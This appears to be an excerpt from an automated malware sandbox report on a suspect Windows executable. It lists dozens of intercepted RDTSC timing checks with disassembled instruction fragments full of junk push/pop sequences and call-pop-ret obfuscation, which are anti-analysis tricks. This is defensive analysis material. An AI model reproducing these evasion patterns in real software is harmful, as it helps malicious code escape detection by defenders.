                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 107754A second address: 10775B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007FF30CF3CAE6h 0x0000000e jno 00007FF30CF3CAE6h 0x00000014 popad 0x00000015 popad 0x00000016 pop eax 0x00000017 jc 00007FF30CF3CAECh 0x0000001d mov edx, dword ptr [ebp+122D2993h] 0x00000023 push 00000003h 0x00000025 mov edi, dword ptr [ebp+122D219Ch] 0x0000002b mov di, si 0x0000002e push 00000000h 0x00000030 mov ch, 33h 0x00000032 push 00000003h 0x00000034 mov dx, bx 0x00000037 push D9051FFDh 0x0000003c jmp 00007FF30CF3CAEAh 0x00000041 xor dword ptr [esp], 19051FFDh 0x00000048 jmp 00007FF30CF3CAF1h 0x0000004d lea ebx, dword ptr [ebp+1244C1A4h] 0x00000053 mov di, ax 0x00000056 xchg eax, ebx 0x00000057 push ebx 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1077699 second address: 107769E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 107769E second address: 10776CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAF2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF30CF3CAF0h 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10995E6 second address: 1099638 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF30D194DC7h 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FF30D194DC5h 0x00000016 pop eax 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007FF30D194DB6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1099638 second address: 109963C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109963C second address: 1099640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1099640 second address: 1099649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1099649 second address: 1099659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF30D194DB6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1099659 second address: 109965F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109965F second address: 1099683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF30D194DB6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FF30D194DC6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109764E second address: 1097652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1097652 second address: 1097672 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FF30D194DC2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1097672 second address: 1097678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1097678 second address: 10976A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF30D194DCFh 0x0000000a popad 0x0000000b jg 00007FF30D194DC4h 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10977EA second address: 1097806 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF7h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1097806 second address: 109780C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1097979 second address: 109797F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109797F second address: 1097985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1097DBA second address: 1097DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1098207 second address: 109820C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109820C second address: 1098212 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1098497 second address: 10984B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30D194DC8h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10984B3 second address: 10984CA instructions: 0x00000000 rdtsc 0x00000002 js 00007FF30CF3CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jng 00007FF30CF3CB1Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10984CA second address: 10984CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109865D second address: 1098663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1098663 second address: 109867D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF30D194DBEh 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109867D second address: 1098681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1098681 second address: 10986A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a jmp 00007FF30D194DC2h 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 jl 00007FF30D194DBCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1098EAF second address: 1098EBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1098EBF second address: 1098ED1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF30D194DB8h 0x00000008 js 00007FF30D194DBEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109941C second address: 1099420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1099420 second address: 109943B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF30D194DC2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109943B second address: 1099446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF30CF3CAE6h 0x0000000a popad 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109C1DB second address: 109C1EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30D194DBCh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109B410 second address: 109B42C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FF30CF3CAEFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4F16 second address: 10A4F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f jnc 00007FF30D194DBCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4F2D second address: 10A4F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FF30CF3CAE6h 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4304 second address: 10A4308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A46E5 second address: 10A46E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A46E9 second address: 10A46ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A46ED second address: 10A46F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A46F9 second address: 10A46FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A46FD second address: 10A4710 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF30CF3CAE6h 0x00000008 jnl 00007FF30CF3CAE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4710 second address: 10A4747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF30D194DB6h 0x0000000a jmp 00007FF30D194DC9h 0x0000000f popad 0x00000010 jmp 00007FF30D194DBBh 0x00000015 popad 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4747 second address: 10A474B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A474B second address: 10A474F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4A6D second address: 10A4A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jl 00007FF30CF3CB04h 0x0000000b jmp 00007FF30CF3CAEDh 0x00000010 jmp 00007FF30CF3CAF1h 0x00000015 pop esi 0x00000016 push eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4A9B second address: 10A4AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4C56 second address: 10A4C72 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF30CF3CAE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FF30CF3CAEEh 0x00000012 pop esi 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4C72 second address: 10A4C8C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF30D194DC1h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4DCF second address: 10A4DD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF30CF3CAE6h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A58B2 second address: 10A58C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30D194DC0h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A58C6 second address: 10A58CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A5EF4 second address: 10A5EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A6699 second address: 10A66AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAEDh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A66AE second address: 10A66BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A66BB second address: 10A66D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF30CF3CAF6h 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A67BC second address: 10A67DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF30D194DC1h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A68B0 second address: 10A68B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A68B4 second address: 10A68D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FF30D194DBCh 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f jno 00007FF30D194DBCh 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A6FB6 second address: 10A6FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A6FBC second address: 10A6FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A6FC0 second address: 10A7062 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF30CF3CAEBh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FF30CF3CAE8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov esi, dword ptr [ebp+122D1991h] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007FF30CF3CAE8h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d call 00007FF30CF3CAEFh 0x00000052 je 00007FF30CF3CAE9h 0x00000058 movsx edi, si 0x0000005b pop edi 0x0000005c xchg eax, ebx 0x0000005d jmp 00007FF30CF3CAECh 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 push ebx 0x00000066 jmp 00007FF30CF3CAF1h 0x0000006b pop ebx 0x0000006c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A786E second address: 10A7880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FF30D194DBCh 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A8967 second address: 10A896C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A9485 second address: 10A9489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10AA867 second address: 10AA8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FF30CF3CAE8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D36FAh], edi 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c movzx esi, si 0x0000002f xchg eax, ebx 0x00000030 jmp 00007FF30CF3CAF9h 0x00000035 push eax 0x00000036 pushad 0x00000037 ja 00007FF30CF3CAECh 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10ABF44 second address: 10ABF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10ABF48 second address: 10ABF52 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF30CF3CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10ABF52 second address: 10ABF59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10ABF59 second address: 10ABF6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF30CF3CAEAh 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10B0F0F second address: 10B0F15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10B0F15 second address: 10B0F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10B3FC3 second address: 10B3FC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10B0132 second address: 10B01EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAF4h 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FF30CF3CAE8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c call 00007FF30CF3CAEAh 0x00000031 jnl 00007FF30CF3CAE8h 0x00000037 pop edi 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007FF30CF3CAE8h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 0000001Ch 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 mov eax, dword ptr [ebp+122D0DD9h] 0x0000005f add dword ptr [ebp+12479DF7h], edi 0x00000065 push FFFFFFFFh 0x00000067 sbb bx, 69A7h 0x0000006c nop 0x0000006d push ecx 0x0000006e jmp 00007FF30CF3CAECh 0x00000073 pop ecx 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007FF30CF3CAF8h 0x0000007c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10B3FC9 second address: 10B3FEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10B3FEA second address: 10B3FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10B5EE8 second address: 10B5F69 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF30D194DB8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FF30D194DB8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007FF30D194DB8h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 jmp 00007FF30D194DBAh 0x00000048 mov ebx, dword ptr [ebp+122D19F4h] 0x0000004e push 00000000h 0x00000050 call 00007FF30D194DBBh 0x00000055 mov edi, edx 0x00000057 pop edi 0x00000058 push eax 0x00000059 push ecx 0x0000005a push eax 0x0000005b push edx 0x0000005c jno 00007FF30D194DB6h 0x00000062 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10B3227 second address: 10B322B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10B7F63 second address: 10B7F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FF30D194DC7h 0x0000000e rdtsc
